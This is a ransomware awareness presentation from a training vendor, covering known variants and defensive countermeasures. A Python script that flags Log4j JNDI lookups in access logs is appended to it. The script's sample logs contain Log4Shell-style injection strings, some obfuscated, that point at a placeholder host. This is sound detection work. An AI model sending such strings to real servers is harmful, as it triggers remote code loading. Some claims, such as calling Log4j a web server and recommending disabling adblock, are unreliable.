Ransomware- A Reality Check (Part 2)

Ransomware has been the most significant threat for years; it has affected many sectors and remains one of the top risks. The topics covered in the webinar are detailed in this blog for reference.

Presentation Transcript


  1. Ransomware- A Reality Check (Part 2) www.infosectrain.com | sales@infosectrain.com

  3. Ransomware- A reality check (Part 1) • Ransomware- A reality check (Part 2) • Ransomware- A reality check (Part 3)

  4. Variants of Ransomware
     • Bad Rabbit: It was distributed through a fake Adobe Flash update on a corrupt website; once the fake update is downloaded, your data has been compromised.
     • CryptoWall: The malware hides in zip files and other email attachments, and then it makes its way to your devices. Once you install them, it tries to find Java vulnerabilities to encrypt or withhold your data.
     • Petya: It is a crypto-ransomware that targets your Windows servers, laptops, or PCs. It mostly takes advantage of SMB (Server Message Block), tries to steal your credentials, and spreads itself into your machine.
     • WannaCry: It was first seen in a large-scale crypto-ransomware attack in 2017. It affected almost a quarter-million machines internationally, and it spreads through the Windows operating system.
     • BlackByte: It is a notorious variant that compromised multiple US and foreign businesses, including three critical US infrastructure sectors. It encrypts your files and compromises the Windows host system, including physical and virtual servers.

  5. Countermeasures
     The following are the countermeasures or defense mechanisms to be implemented to ensure safe data transfer:

  6. Using Firewall to its fullest capability
     Firewalls are the most reliable. If a firewall does not allow a malicious web request, or an email security gateway has been implemented, then the users will not get any malicious attacks or emails. But if the firewall fails, there should be backup plans.
     Log4j attack: The Log4j vulnerability, an Apache web server, has been exploited in the wild through games, moving from exploiting the game servers to the actual corporate servers.
     User Education
     For example, if an email passes through an email security gateway and firewall, and the user is unaware of potential phishing emails, it increases the attack surface. Kevin Mitnick, the most notorious hacker, started with phishing over the telephone, and the FBI searched for him a lot. There is training from a company called KnowBe4 that makes the user aware of phishing and how to identify emails received from an unsuspected user.

  7. Disabling Macros execution
     Macro execution is a popular way for people to get exploited. For example, a malicious document is attached to an email, and the user who receives it is unaware of this and thinks it is legitimate. He then opens the document, and the macros get enabled in the organization if he uses the organization network. Macros are small code blocks that get executed automatically in the background, primarily when an Office application is based on Visual Basic. These codes are written to exploit any existing vulnerabilities in the computers.

  8. Implement Web security
     The cross-site scripting attack: suppose your browser is vulnerable to a particular attack. These types of browser vulnerabilities are exploited when the user visits a malicious website. The website of the well-known chef Jamie Oliver was vulnerable, and everyone visiting it downloaded the malicious code in the background. To overcome such malicious code, every organization should implement WAF rules and disable adblock.

  9. Incorporate least privilege policy
     Rule-based access control and our backup are most important. Giving people privileged access only to perform the activity, not full access, is part of a defense-in-depth strategy.
     Network Segmentation
     The HR department receives more external emails with documents or PDF files than the software development department. Do you think both should work on the same network if you want to implement high security? If HR receives a malicious email and clicks, the malware starts spreading in the environment. For example, Wipro was part of the MSSP attack. The infection came through a supply chain attack because some other team had clicked a URL that let people come into the network. If they had segmented their network, they would have prevented it.

  10. Active monitoring
     Security analysts in the Security Operation Center (SOC) monitor alerts 24/7. They look to modify and identify the attacks. For example, when they figured out that Log4j was being exploited, with 3000 Log4j attempts, they implemented alerts and security measures to block the attempts and notify us. That helps to take further steps and investigate that particular source or IP address.
     Action Plan
     It’s not about how you will be attacked; it’s about when you will be attacked. Even organizations with high security are compromised, and an action plan helps in this case. A clear and detailed action plan of what to do and how to do it when an attack occurs includes the most practical and effective countermeasures to implement quickly.

  11. About InfosecTrain
     • Established in 2016, we are one of the finest Security and Technology Training and Consulting companies
     • Wide range of professional training programs, certifications & consulting services in the IT and Cyber Security domain
     • High-quality technical services, certifications or customized training programs curated with professionals of over 15 years of combined experience in the domain

  12. Our Endorsements

  13. Why InfosecTrain
     • Global Learning Partners
     • Access to the recorded sessions
     • Certified and Experienced Instructors
     • Flexible modes of Training
     • Post training completion
     • Tailor Made Training

  14. Our Trusted Clients

  15. Contact us
     Get your workforce reskilled by our certified and experienced instructors! IND: 1800-843-7890 (Toll Free) / US: +1 657-221-1127 / UK: +44 7451 208413 sales@infosectrain.com www.infosectrain.com
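
The kind of alerting described on the Active monitoring slide, as an added example that is not part of the original presentation: it counts Log4j JNDI lookup strings per source IP in web access logs and flags sources at or above a threshold. The log lines, the `placeholder.invalid` host and the threshold of 3 are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in combined log format (documentation IP ranges only).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET /?q=${jndi:ldap://placeholder.invalid/a} HTTP/1.1" 404 153 "-" "curl/7.79"
203.0.113.7 - - [12/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.invalid/b}"
203.0.113.7 - - [12/Dec/2021:10:01:05 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fc%7D HTTP/1.1" 404 153 "-" "curl/7.79"
198.51.100.23 - - [12/Dec/2021:10:02:10 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${lower:j}ndi:dns://placeholder.invalid}"
192.0.2.10 - - [12/Dec/2021:10:03:00 +0000] "GET /docs/jndi-guide.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)  # ${lower:x} -> x
JNDI = re.compile(r"\$\{jndi:", re.I)                           # lookup marker
SOURCE_IP = re.compile(r"^(\S+) ")                              # first log field


def normalize(text):
    """Undo URL-encoding (single or double) and collapse case-lookup wrappers."""
    text = unquote(unquote(text))
    prev = None
    while prev != text:
        prev = text
        text = NESTED.sub(r"\1", text)
    return text


def count_attempts(lines):
    """Return a Counter of JNDI lookup attempts keyed by source IP."""
    hits = Counter()
    for line in lines:
        m = SOURCE_IP.match(line)
        if m and JNDI.search(normalize(line)):
            hits[m.group(1)] += 1
    return hits


def alerts(hits, threshold):
    """Sources whose attempt count reaches the (assumed) alert threshold."""
    return sorted(ip for ip, n in hits.items() if n >= threshold)


if __name__ == "__main__":
    hits = count_attempts(SAMPLE_LOG.splitlines())
    for ip in alerts(hits, threshold=3):
        print(f"ALERT {ip}: {hits[ip]} Log4j lookup attempts")
```

The whole line is scanned rather than only the URL, because the lookup string is logged wherever the application records request data, including headers such as User-Agent.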